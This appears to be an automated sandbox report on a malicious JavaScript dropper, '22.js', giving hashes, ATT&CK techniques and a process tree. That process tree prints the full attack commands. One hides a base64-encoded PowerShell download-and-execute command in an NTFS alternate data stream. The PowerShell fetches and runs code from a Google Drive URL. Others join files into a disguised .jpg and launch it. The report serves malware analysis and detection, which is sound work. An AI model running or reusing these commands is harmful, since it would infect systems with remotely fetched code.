e632c7853782a7d4251f761a03037ca33e2421b2bec28d4afefb8ae516460c88

Analysis

max time kernel
119s
max time network
129s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
14-10-2023 03:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

½ļ/22.js
Size

8KB
MD5

93713221ec3d756d1091b3a05d489ef8
SHA1

1314a70eea9319ac8658b2047648c2093307fc5b
SHA256

76e50a76cc320a29117e8466db4f31ba6f04510f07811536654e5316ace67b2d
SHA512

b1128128bf3aae525694d5c6d9f1ecd009674beea5e3c1ded93078f8e5c3edc8b0372ae3e05c7bb383bab755d5d96caf8e215036f915338a20b10971694d683e
SSDEEP

12:4XF1YOUhNJeyM121Evnps8Cnon1YVkVfNb5j0BbRZBbwGk3:4XFSZXe8EvpsheaOVfsBbRZBbC3

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&confirm=no_antivirus&id=1bDMmMiZveQVwS9Ni4mQLsBYrsYXm_mY9

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2604	powershell.exe
7	2604	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

NTFS ADS 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\LocalAnyName.Anyname:AnyName.Anyname	cmd.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2604	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2604	powershell.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 2344 wrote to memory of 2780	2344	wscript.exe	28
PID 2344 wrote to memory of 2780	2344	wscript.exe	28
PID 2344 wrote to memory of 2780	2344	wscript.exe	28
PID 2780 wrote to memory of 2648	2780	cmd.exe	30
PID 2780 wrote to memory of 2648	2780	cmd.exe	30
PID 2780 wrote to memory of 2648	2780	cmd.exe	30
PID 2648 wrote to memory of 2604	2648	cmd.exe	31
PID 2648 wrote to memory of 2604	2648	cmd.exe	31
PID 2648 wrote to memory of 2604	2648	cmd.exe	31
PID 2604 wrote to memory of 2632	2604	powershell.exe	32
PID 2604 wrote to memory of 2632	2604	powershell.exe	32
PID 2604 wrote to memory of 2632	2604	powershell.exe	32
PID 2632 wrote to memory of 2556	2632	csc.exe	33
PID 2632 wrote to memory of 2556	2632	csc.exe	33
PID 2632 wrote to memory of 2556	2632	csc.exe	33
PID 2604 wrote to memory of 2796	2604	powershell.exe	34
PID 2604 wrote to memory of 2796	2604	powershell.exe	34
PID 2604 wrote to memory of 2796	2604	powershell.exe	34
PID 2604 wrote to memory of 2304	2604	powershell.exe	35
PID 2604 wrote to memory of 2304	2604	powershell.exe	35
PID 2604 wrote to memory of 2304	2604	powershell.exe	35

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\½ļ\22.js
1⤵
- Suspicious use of WriteProcessMemory
PID:2344
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" cmD /c ECHo PoweRSHEll -ec aQBFAHgAKAAoAE4AZQBXAC0ATwBiAGoARQBjAFQAIAAJAG4ARQBUAC4AdwBFAEIAYwBMAEkAZQBOAHQAKQAuAGQAbwBXAE4ATABPAEEAZABzAFQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAGQAcgBpAHYAZQAuAGcAbwBvAGcAbABlAC4AYwBvAG0ALwB1AGMAPwBlAHgAcABvAHIAdAA9AGQAbwB3AG4AbABvAGEAZAAmAGMAbwBuAGYAaQByAG0APQBuAG8AXwBhAG4AdABpAHYAaQByAHUAcwAmAGkAZAA9ADEAYgBEAE0AbQBNAGkAWgB2AGUAUQBWAHcAUwA5AE4AaQA0AG0AUQBMAHMAQgBZAHIAcwBZAFgAbQBfAG0AWQA5ACcAKQApAA== > %LOCALAPPDATA%AnyName.Anyname:AnyName.Anyname & CMD - < %LOCALAPPDATA%AnyName.Anyname:AnyName.Anyname
  2⤵
  - NTFS ADS
  - Suspicious use of WriteProcessMemory
  PID:2780
- - C:\Windows\system32\cmd.exe
    CMD -
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2648
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      PoweRSHEll -ec aQBFAHgAKAAoAE4AZQBXAC0ATwBiAGoARQBjAFQAIAAJAG4ARQBUAC4AdwBFAEIAYwBMAEkAZQBOAHQAKQAuAGQAbwBXAE4ATABPAEEAZABzAFQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAGQAcgBpAHYAZQAuAGcAbwBvAGcAbABlAC4AYwBvAG0ALwB1AGMAPwBlAHgAcABvAHIAdAA9AGQAbwB3AG4AbABvAGEAZAAmAGMAbwBuAGYAaQByAG0APQBuAG8AXwBhAG4AdABpAHYAaQByAHUAcwAmAGkAZAA9ADEAYgBEAE0AbQBNAGkAWgB2AGUAUQBWAHcAUwA5AE4AaQA0AG0AUQBMAHMAQgBZAHIAcwBZAFgAbQBfAG0AWQA5ACcAKQApAA==
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2604
    - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\72-u0v8g.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2632
      - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7B87.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC7B86.tmp"
        6⤵
        
        PID:2556
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c copy /B %LOCALAPPDATA%\U767J7I7IMII7I.bmp + %LOCALAPPDATA%\6u7u7ujye6rej6r6jrk7yrj76kr76kr7676kk76.avi %LOCALAPPDATA%\J98J7K87J9987JT7I6H7J6K7RHJ66U6GH6JI76.jpg
        5⤵
        
        PID:2796
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /k StarT %LOCALAPPDATA%\J98J7K87J9987JT7I6H7J6K7RHJ66U6GH6JI76.jpg
        5⤵
        
        PID:2304

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\72-u0v8g.dll

Filesize
3KB

MD5
42d5560165a675bac5ea87bf71ec0d4b

SHA1
4546df5a2690430459a52b5374f12e75b51f5b63

SHA256
18f978335179abe0b3e7ee9d0e9abfc833e8b51a8183466eafecf8a8bbc55736

SHA512
b656001ec8df7dff24a3b1c9bea6b8f69f2ce49803a2af1216f0bbf9df15288dc41a3a3afc6e06704cc335770ba523658fc0a488459436b6cfa1c99cf64228ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\72-u0v8g.pdb

Filesize
7KB

MD5
6d81f4aaf9b55089300c5f92621a8288

SHA1
f375d73dafea4fa77eb1ef609b44435263faa1e8

SHA256
13d1602463c783a5a0cf948097f9d093f9b6e61bf2da3f58f23a46aef030e9a1

SHA512
919ec841ad0b7786618447f1796b01f4c0cc6d4c39f0f7f679fbab511dd7545c9c7e2edeb1ff39da1788e311079840022c1021968bfea3bf7a4f1919f38d78ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES7B87.tmp

Filesize
1KB

MD5
c03b439a1641b8d8126fe59a3a680f78

SHA1
6035a310906fccca3d02ed4251387a07abd91827

SHA256
dd34fa99a422a23e0979088c98dccd847cd672dd813cc078839f0880796c4357

SHA512
8780e6c59650ddd2269eea8ebaeb26bc052aa47387026aec9b190e45b38c351fd157c744ce48be5eda412a0f4c00a3f936017167157e4b9e1f107aeb43484cc2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\72-u0v8g.0.cs

Filesize
4KB

MD5
7fe88e1b8c1cec742f7133165520183a

SHA1
017135b61569de732386b7dc19b657d98d447cb5

SHA256
0bedae788053647754b795320db78e5fa2a4fd2af95075443e15e4127d33f14b

SHA512
17ffb73392306636699341596a0dcaa0417ebdd61f8a9eae6e6b9832a016a72cfaf9a7227206ed42efad1f3a359c7650b7faeee3ee6f94b292bc544e0c45b218

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\72-u0v8g.cmdline

Filesize
309B

MD5
32a772d9c3d43461c6d8a2a2b32bc6d6

SHA1
0703e9ccfd62b23f683a9f1fcd03c3bc2595dba6

SHA256
6f2b9f73547a0d388c29b9a87a939e7256fa71f295ecce184bafdc56e3bf07b4

SHA512
174f6e63622e16af033b7f2245d4c95aaf3690e7169a4ea92133eb267319afe89db7216ad421368b6195b96656c86cc55a4aec350b262ed0f43966a2faa03ed0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC7B86.tmp

Filesize
652B

MD5
2ac45a779908e60743abc954f322b528

SHA1
bad426808bfe5158612fc9f9e503264edb7def13

SHA256
4b44b32cf8f52c97a972080558cf6607b994ab2c0218be85356c26ea28027793

SHA512
ed99f4aa5f5d64499a7cb64153cfb290b756707612ccfd46b5f8d8bd8ae3a263c92629907e159d8b388fdcd1075d7c9f9aab0c059bdc8101d6a924543452b2db

Download Submit
memory/2604-10-0x0000000001D70000-0x0000000001DF0000-memory.dmp

Filesize
512KB

Download
memory/2604-6-0x000007FEF6050000-0x000007FEF69ED000-memory.dmp

Filesize
9.6MB

Download
memory/2604-5-0x000000001B300000-0x000000001B5E2000-memory.dmp

Filesize
2.9MB

Download
memory/2604-39-0x000007FEF6050000-0x000007FEF69ED000-memory.dmp

Filesize
9.6MB

Download
memory/2604-9-0x0000000001D70000-0x0000000001DF0000-memory.dmp

Filesize
512KB

Download
memory/2604-8-0x000007FEF6050000-0x000007FEF69ED000-memory.dmp

Filesize
9.6MB

Download
memory/2604-7-0x0000000001E60000-0x0000000001E68000-memory.dmp

Filesize
32KB

Download
memory/2604-11-0x0000000001D70000-0x0000000001DF0000-memory.dmp

Filesize
512KB

Download
memory/2604-26-0x000000001B200000-0x000000001B208000-memory.dmp

Filesize
32KB

Download
memory/2604-29-0x000007FEF6050000-0x000007FEF69ED000-memory.dmp

Filesize
9.6MB

Download
memory/2604-30-0x000007FEF6050000-0x000007FEF69ED000-memory.dmp

Filesize
9.6MB

Download
memory/2604-31-0x0000000001D70000-0x0000000001DF0000-memory.dmp

Filesize
512KB

Download
memory/2604-32-0x0000000001D70000-0x0000000001DF0000-memory.dmp

Filesize
512KB

Download
memory/2604-33-0x0000000001D70000-0x0000000001DF0000-memory.dmp

Filesize
512KB

Download
memory/2604-34-0x0000000001D70000-0x0000000001DF0000-memory.dmp

Filesize
512KB

Download
memory/2632-17-0x0000000000700000-0x0000000000780000-memory.dmp

Filesize
512KB

Download